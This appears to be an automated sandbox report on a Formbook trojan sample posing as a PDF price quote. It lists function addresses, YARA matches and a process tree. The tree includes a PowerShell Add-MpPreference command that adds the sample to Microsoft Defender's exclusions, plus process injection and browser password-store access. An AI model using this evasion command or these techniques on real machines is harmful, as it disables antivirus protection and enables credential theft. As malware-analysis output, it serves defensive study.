Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D00CF2 9_2_04D00CF2
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DB0CB5 9_2_04DB0CB5
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D10C00 9_2_04D10C00
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D0ADE0 9_2_04D0ADE0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D28DBF 9_2_04D28DBF
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DACD1F 9_2_04DACD1F
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D1AD00 9_2_04D1AD00
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DCEEDB 9_2_04DCEEDB
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D22E90 9_2_04D22E90
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DCCE93 9_2_04DCCE93
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D10E59 9_2_04D10E59
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DCEE26 9_2_04DCEE26
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D02FC8 9_2_04D02FC8
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D1CFE0 9_2_04D1CFE0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D8EFA0 9_2_04D8EFA0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D84F40 9_2_04D84F40
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D30F30 9_2_04D30F30
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DB2F30 9_2_04DB2F30
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D52F28 9_2_04D52F28
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D3E8F0 9_2_04D3E8F0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04CF68B8 9_2_04CF68B8
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D1A840 9_2_04D1A840
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D12840 9_2_04D12840
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D129A0 9_2_04D129A0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DDA9A6 9_2_04DDA9A6
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D26962 9_2_04D26962
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D0EA80 9_2_04D0EA80
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DC6BD7 9_2_04DC6BD7
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DCAB40 9_2_04DCAB40
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D01460 9_2_04D01460
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DCF43F 9_2_04DCF43F
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DAD5B0 9_2_04DAD5B0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DC7571 9_2_04DC7571
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DC16CC 9_2_04DC16CC
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DCF7B0 9_2_04DCF7B0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D170C0 9_2_04D170C0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DBF0CC 9_2_04DBF0CC
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DC70E9 9_2_04DC70E9
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DCF0E0 9_2_04DCF0E0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D1B1B0 9_2_04D1B1B0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DDB16B 9_2_04DDB16B
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D4516C 9_2_04D4516C
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04CFF172 9_2_04CFF172
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D2B2C0 9_2_04D2B2C0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DB12ED 9_2_04DB12ED
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D152A0 9_2_04D152A0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D5739A 9_2_04D5739A
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04CFD34C 9_2_04CFD34C
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DC132D 9_2_04DC132D
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DCFCF2 9_2_04DCFCF2
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D89C32 9_2_04D89C32
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D2FDC0 9_2_04D2FDC0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DC1D5A 9_2_04DC1D5A
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D13D40 9_2_04D13D40
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DC7D73 9_2_04DC7D73
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D19EB0 9_2_04D19EB0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D11F92 9_2_04D11F92
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DCFFB1 9_2_04DCFFB1
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DCFF09 9_2_04DCFF09
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D138E0 9_2_04D138E0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D7D800 9_2_04D7D800
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D19950 9_2_04D19950
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D2B950 9_2_04D2B950
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DA5910 9_2_04DA5910
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DBDAC6 9_2_04DBDAC6
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D55AA0 9_2_04D55AA0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DADAAC 9_2_04DADAAC
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DB1AA3 9_2_04DB1AA3
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DCFA49 9_2_04DCFA49
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DC7A46 9_2_04DC7A46
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D83A6C 9_2_04D83A6C
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D85BF0 9_2_04D85BF0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D4DBF9 9_2_04D4DBF9
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04D2FB80 9_2_04D2FB80
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_04DCFB76 9_2_04DCFB76
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BD1920 9_2_00BD1920
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BEA430 9_2_00BEA430
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BCCB20 9_2_00BCCB20
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BCCB18 9_2_00BCCB18
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BCADC0 9_2_00BCADC0
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BCCD40 9_2_00BCCD40
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BD3460 9_2_00BD3460
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_00BD345B 9_2_00BD345B
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_0502A4E9 9_2_0502A4E9
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_0502C1BC 9_2_0502C1BC
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_0502B228 9_2_0502B228
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_0502BD08 9_2_0502BD08
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: 9_2_0502BE24 9_2_0502BE24
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: String function: 04D8F290 appears 105 times
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: String function: 04D57E54 appears 101 times
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: String function: 04CFB970 appears 280 times
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: String function: 04D45130 appears 58 times
Source: C:\Windows\SysWOW64\unregmp2.exe Code function: String function: 04D7EA12 appears 86 times
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: String function: 01B5F290 appears 105 times
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: String function: 01B15130 appears 58 times
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: String function: 01ACB970 appears 280 times
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: String function: 01B27E54 appears 110 times
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Code function: String function: 01B4EA12 appears 86 times
Sample file is different than original file name gathered from version info
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1326590158.000000000122E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1335226544.00000000057A0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameRT.dll. vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1328306101.000000000490E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1327008085.0000000002E30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1336186879.0000000007BF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamePowerShell.EXEj% vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: periodtrackConductortrackComposertrackPerformertrackNumbertrackTitleWMContentIDpublisherRatingproviderStylealbumArtistalbumTitleWMCollectionGroupIDWMCollectionIDgenrelabelreleaseDatecommunityRatingdataProviderWM/IsCompilationAverageLevelPeakValueWM/WMCPDistributorIDWM/WMCPDistributorWM/WMShadowFileSourceDRMTypeWM/WMShadowFileSourceFileTypeWM/MediaOriginalBroadcastDateTimeWM/MediaOriginalChannelWM/MediaStationNameWM/SubTitleDescriptionWM/SubscriptionContentIDWM/ContentDistributorWM/ProviderStyleWM/ProviderRatingWM/ProviderWM/ISRCWM/DRMWM/CodecWM/PlaylistDelayWM/RadioStationOwnerWM/RadioStationNameWM/ModifiedByWM/UniqueFileIdentifierWM/WMCollectionGroupIDWM/WMCollectionIDWM/WMContentIDWM/DVDIDWM/TextWM/MoodWM/InitialKeyWM/BeatsPerMinuteWM/ParentalRatingWM/LanguageWM/AudioSourceURLWM/AudioFileURLWM/UserWebURLWM/AuthorURLWM/EncodingTimeWM/EncodingSettingsWM/EncodedByWM/PublisherWM/OriginalFilenameWM/OriginalReleaseYearWM/OriginalAlbumTitleWM/OriginalArtistWM/OriginalLyricistWM/Lyrics_SynchronisedWM/PictureWM/CategoryWM/PeriodWM/MediaClassSecondaryIDWM/MediaClassPrimaryIDWM/VideoFrameRateWM/VideoWidthWM/VideoHeightWM/ProtectionTypeWM/PartOfSetWM/SubTitleWM/ContentGroupDescriptionWM/DirectorWM/ProducerWM/ConductorWM/WriterAspectRatioYAspectRatioXWM/AlbumArtistIsVBRWM/ToolVersionWM/ToolNameWM/TrackNumberWM/LyricsWM/ComposerWM/MCDIWM/GenreIDWM/YearWM/GenreWM/AlbumCoverURLWM/PromotionURLWM/AlbumTitleDRM_IndividualizedVersionDRM_KeyIDCopyrightDescriptionAuthorTitleFileSizeCurrentBitrateIs_ProtectedDuration vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.0000000001637000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunregmp2.exej% vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542591990.00000000016A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameunregmp2.exej% vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000007.00000002.1542899848.0000000001BCD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Binary or memory string: OriginalFilenameZhsW.exe0 vs Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe
Uses 32bit PE files
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 7.2.Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3781878826.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.1542475565.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3779603566.0000000004B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.1542102505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3779712875.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3777691693.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3779117946.0000000003600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.1543709314.00000000027F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/5@16/10
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7188:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmylzck2.c5h.ps1 Jump to behavior
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unregmp2.exe, 00000009.00000002.3778117405.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1722883455.00000000030B6000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3778117405.00000000030E5000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000003.1722762496.0000000003094000.00000004.00000020.00020000.00000000.sdmp, unregmp2.exe, 00000009.00000002.3778117405.00000000030B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe ReversingLabs: Detection: 60%
Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Virustotal: Detection: 60%
Source: unknown Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe"
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Process created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\SysWOW64\unregmp2.exe"
Source: C:\Windows\SysWOW64\unregmp2.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe" Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe" Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe" Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Process created: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe "C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe" Jump to behavior
Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe Process created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\SysWOW64\unregmp2.exe" Jump to behavior
Source: C:\Windows\SysWOW64\unregmp2.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe Section loaded: cryptbase.dll Jump to behavior
